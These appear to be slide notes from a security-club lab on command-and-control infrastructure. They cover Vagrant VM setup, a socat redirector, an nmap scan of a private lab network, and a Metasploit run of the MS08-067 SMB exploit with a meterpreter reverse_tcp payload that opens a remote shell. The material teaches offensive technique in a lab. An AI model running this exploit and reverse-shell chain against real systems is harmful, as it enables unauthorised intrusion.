First Vagrant!

• Make sure it is installed
• grab the Vagrantfile or if you have Kali this Vagrantfile
  • powershell
  •  
  • OSX
  •  
  • Linux

• vagrant up! no really...                   (this will take a bit...)

wget https://raw.githubusercontent.com/49thSecurityDivision/slideshows/master/2017/01-Intermediate-Monday/08-C2-Infra/Vagrantfile -O Vagrantfile

curl https://raw.githubusercontent.com/49thSecurityDivision/slideshows/master/2017/01-Intermediate-Monday/08-C2-Infra/Vagrantfile -o Vagrantfile

wget https://raw.githubusercontent.com/49thSecurityDivision/slideshows/master/2017/01-Intermediate-Monday/08-C2-Infra/Vagrantfile

vagrant up

Learning from others

• My research
  • reddit
  • github
  • corelan
  • C2

Visualization

House keeping...

• fixing windows
  • check - 
  • fix
  • verify

• setup redir

vagrant ssh winxp
ipconfig

vagrant ssh redir
sudo socat TCP4-LISTEN:443,fork TCP4:192.168.55.2:443

Recon!

• Vagrant commands
  • see all vms

• Now Kali

vagrant global-status

vagrant ssh kali
ifconfig
nmap -sT -O 192.168.55.0/24 -oA initial-network
ls

Recon

Exploitation - metasploit

use exploit/windows/smb/ms08_067_netapi
set payload windows/meterpreter/reverse_tcp         # This is the payload I set
show options                                        # This shows all the options for the payload and exploit
set RHOST 192.168.55.3                              # The host you are attacking
set LHOST 192.168.55.4                              # The external IP that the payload should connect to
set LPORT 443                                       # External port that the payload will connect to
set ReverseListenerBindAddress 192.168.55.2         # The internal IP address of the kali box that's being NAT'd
set ReverseListenerBindPort 443
set ExitOnSession false                             # Don't stop the handler once a session is established (allows you to receive multiple sessions for a handler)
exploit -j -z                                       # Start the exploit as a job. Do not automatically interact with new sessions.

## after you have your session do this to see and interact with it.
sessions -l
# connect to whatever your session number is that displays below
sessions -i 1
# to interact with your exploited host
shell
# to show that the metasploit module isn't connected to your machine
netstat